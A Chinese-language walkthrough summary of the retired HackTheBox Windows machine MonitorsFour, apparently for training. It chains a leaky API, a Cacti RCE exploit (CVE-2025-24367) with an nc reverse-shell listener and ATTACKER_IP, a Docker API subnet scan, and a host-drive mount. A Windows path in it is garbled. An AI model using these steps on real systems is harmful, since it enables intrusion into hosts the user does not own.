平台: HackTheBox 操作系统: Windows 状态:已退役 — 完整演练已发布。
完整演练: l3dsec.com/walkthroughs/monitorsfour-htb
Nmap → nginx (80) + WinRM (5985)
→ ffuf → cacti.monitorsfour.htb (Cacti)
→ 未认证 API 端点 → 凭据
→ CVE-2025-24367 Cacti RCE → www-data 权限 shell (Docker)
→ CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
→ 挂载宿主机文件系统 → root flag
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
PORT STATE SERVICE VERSION
80/tcp open http nginx
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
虚拟主机模糊测试发现了 cacti.monitorsfour.htb — 一个 Cacti 网络监控实例。
主域名上的未认证 API 端点暴露了用户账户数据,包括 MD5 密码哈希:
curl -s "http://monitorsfour.htb/user?token=0"
MD5 哈希被立即破解 — 获得了 Cacti 的有效凭据。
Cacti 实例存在通过 Graph Template 功能触发的认证后 RCE 漏洞:
nc -lvnp 9001
sudo python3 exploit.py \
-url http://cacti.monitorsfour.htb \
-u marcus \
-p <password> \
-i <ATTACKER_IP> \
-l 9001
在 Docker 容器内获得 www-data 权限的 shell。用户 flag 位于 /home/marcus/user.txt。
Docker socket 未挂载。Docker Desktop 在内部 192.168.65.0/24 子网上未认证地暴露了其 Engine API:
# 扫描开放的 Docker API
for i in $(seq 1 254); do
(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
| grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait
通过该 API 创建了一个容器,挂载了宿主机的 C:\ 驱动器,然后从 C:sers\Administrator\Desktop oot.txt 读取了 root flag。
| Flag | Value |
|---|---|
| User | redacted |
| Root | redacted |
仅供教育目的使用。仅测试您拥有或已获得明确书面许可进行测试的系统。